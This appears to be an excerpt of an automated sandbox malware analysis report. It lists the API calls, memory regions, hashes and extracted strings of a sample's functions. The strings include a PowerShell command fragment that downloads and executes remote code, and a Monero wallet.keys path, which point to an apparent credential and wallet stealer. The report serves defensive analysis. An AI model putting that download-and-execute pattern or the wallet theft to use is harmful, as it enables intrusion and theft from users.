                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 5b6083b1daf6375be203310fbee457d24b4edbaabbab364f951521ee9a975185
                                      • Instruction ID: 1dae40a1aed534d1d59beb79948aad4908a3fab6dd4645dfc0add03f16d2e712
                                      • Opcode Fuzzy Hash: 5b6083b1daf6375be203310fbee457d24b4edbaabbab364f951521ee9a975185
                                      • Instruction Fuzzy Hash: 45410870D402089BEB14FFA4C8A2BEDBB79EF14340F404559E40666192EF742A49CFB1
                                      Function 00D44300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,0167D8C0,00000000,00020119,?), ref: 00D44344
                                      • RegQueryValueExA.ADVAPI32(?,0167DF48,00000000,00000000,00000000,000000FF), ref: 00D44368
                                      • RegCloseKey.ADVAPI32(?), ref: 00D44372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D44397
                                      • lstrcat.KERNEL32(?,0167DF30), ref: 00D443AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 690832082-0
                                      • Opcode ID: fe9dabe7715b4fa5bc6f4620b3264af26a123966bf7b3e685450a5bf17f6947b
                                      • Instruction ID: e052b18eeea87d1b97cb77bfb5a3d3c43430ef8246fd387eca15f014e5f7c7a9
                                      • Opcode Fuzzy Hash: fe9dabe7715b4fa5bc6f4620b3264af26a123966bf7b3e685450a5bf17f6947b
                                      • Instruction Fuzzy Hash: 6C4199B69001086BDB25FBA0EC46FEE733DEB88700F004558B75656185EA7A5BD88BF1
                                      Function 00DACBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: ea0d041163b58a1aeaa0538f504d098d92bc4333caab5b930d4916e8d6f5e815
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: CD219072D20628AFDB329F59CD41A6F3A79EB83BB0F095119F8196B211D7348D418BB0
                                      Function 00D47F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,0166C400,00000000,00020119,?), ref: 00D47FEE
                                      • RegQueryValueExA.ADVAPI32(?,0167D9E0,00000000,00000000,000000FF,000000FF), ref: 00D4800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00D48022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 86b7823a8e01fb3a2523617aaf33b8b562aaf8bb5a2b778556002bcbaf50f640
                                      • Instruction ID: 62262e6261846ed91de7243936419fc4455f106c0c82b1a52f19523c0b4a49b7
                                      • Opcode Fuzzy Hash: 86b7823a8e01fb3a2523617aaf33b8b562aaf8bb5a2b778556002bcbaf50f640
                                      • Instruction Fuzzy Hash: 0B119EB1A40305EFD710CF84D945FBFBBB8EB08B11F104119F695A7284DB7A69049BA1
                                      Function 00D493F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • StrStrA.SHLWAPI(0167E0C8,00000000,00000000,?,00D39F71,00000000,0167E0C8,00000000), ref: 00D493FC
                                      • lstrcpyn.KERNEL32(01007580,0167E0C8,0167E0C8,?,00D39F71,00000000,0167E0C8), ref: 00D49420
                                      • lstrlen.KERNEL32(00000000,?,00D39F71,00000000,0167E0C8), ref: 00D49437
                                      • wsprintfA.USER32 ref: 00D49457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: 85e5cdd1f098f29eea39f803b8d16be85d7c435a31021d5ad808ac0567b3f228
                                      • Instruction ID: abb2861aa3fe080c917d242dc1c544c00d9fda7067c45f4b465ad04bc8b6d39b
                                      • Opcode Fuzzy Hash: 85e5cdd1f098f29eea39f803b8d16be85d7c435a31021d5ad808ac0567b3f228
                                      • Instruction Fuzzy Hash: 03011E75500108FFCB15DFA8C954EEE7B78EB48305F108248F98D9B285DA7AFA44DBA1
                                      Function 00D312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00D312FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 3c317e9e8969a330a01ea9093845d9d516bde19a9a767dfcdfe5744d2fb6d038
                                      • Instruction ID: ce531c785f149f14b3cbe78343e75a0e2b51659bb2fef33142b413de8685bfc9
                                      • Opcode Fuzzy Hash: 3c317e9e8969a330a01ea9093845d9d516bde19a9a767dfcdfe5744d2fb6d038
                                      • Instruction Fuzzy Hash: F1013179A40209BFDB10DFD4DC49FAE777CEB48700F004194FA8597284D779AA008BA0
                                      Function 00D4CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Type
                                      • String ID:
                                      • API String ID: 2109742289-3916222277
                                      • Opcode ID: c4917df2dad6106649a393802ddf591618fc224c840294bf1bea69ff3aaa0103
                                      • Instruction ID: ba9a2724e3f7f90df1d40473cd80d6dccd1da185791b925308797f8a7858ef49
                                      • Opcode Fuzzy Hash: c4917df2dad6106649a393802ddf591618fc224c840294bf1bea69ff3aaa0103
                                      • Instruction Fuzzy Hash: 1341E4B05107989FDB218B288CC5FFB7BE99B45704F1844E8E9CA96182E2719A449F70
                                      Function 00D468D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00D46903
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D469C6
                                      • ExitProcess.KERNEL32 ref: 00D469F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 08d96febb33d8023615361c99ad6ec34ada8cf71a21a389e20f9be587c4ed7f9
                                      • Instruction ID: 26359791b3c054a8713c7270d319c9fc0fe9c05ca3f9ddcd9dff3421dead8154
                                      • Opcode Fuzzy Hash: 08d96febb33d8023615361c99ad6ec34ada8cf71a21a389e20f9be587c4ed7f9
                                      • Instruction Fuzzy Hash: BE3136B1901218ABEB15EBA4DC96FDEB778EF48300F404189F20966181DF796A48CF79
                                      Function 00D48950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E10,00000000,?), ref: 00D489BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D489C6
                                      • wsprintfA.USER32 ref: 00D489E0
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: f3ce450940570bb86d2856c9bd5c5970944c652172014a9eaa9846bf63f92c71
                                      • Instruction ID: c8bd62ea2de9d8efa498d83682c209307acba2d050741e312ae62d6687c94114
                                      • Opcode Fuzzy Hash: f3ce450940570bb86d2856c9bd5c5970944c652172014a9eaa9846bf63f92c71
                                      • Instruction Fuzzy Hash: 88213DB1A44204AFDB25DF98DD45FAEBBB8FB48711F104119FA55A7284C77AA900CBB0
                                      Function 00D48EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D496AE,00000000), ref: 00D48EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D48EF2
                                      • wsprintfW.USER32 ref: 00D48F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 8b3bf3de4fe85a53a9744fb1a7f7400afcda7b6c9e8ecab3f49cf42a33a9020c
                                      • Instruction ID: 518542c2bc157c9672dc308b53a7186d9fa74939a92d87a27637f49f8bdbbc44
                                      • Opcode Fuzzy Hash: 8b3bf3de4fe85a53a9744fb1a7f7400afcda7b6c9e8ecab3f49cf42a33a9020c
                                      • Instruction Fuzzy Hash: 7DE0EC75A44309BFDB21DB94DD0AE6D7BB8EB05702F000194FD8997380DA7AAE109BA1
                                      Function 00D3A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3AA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00D3AB2F
                                      • lstrlen.KERNEL32(00000000), ref: 00D3ADEC
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D3AE73
                                      Memory Dump Source
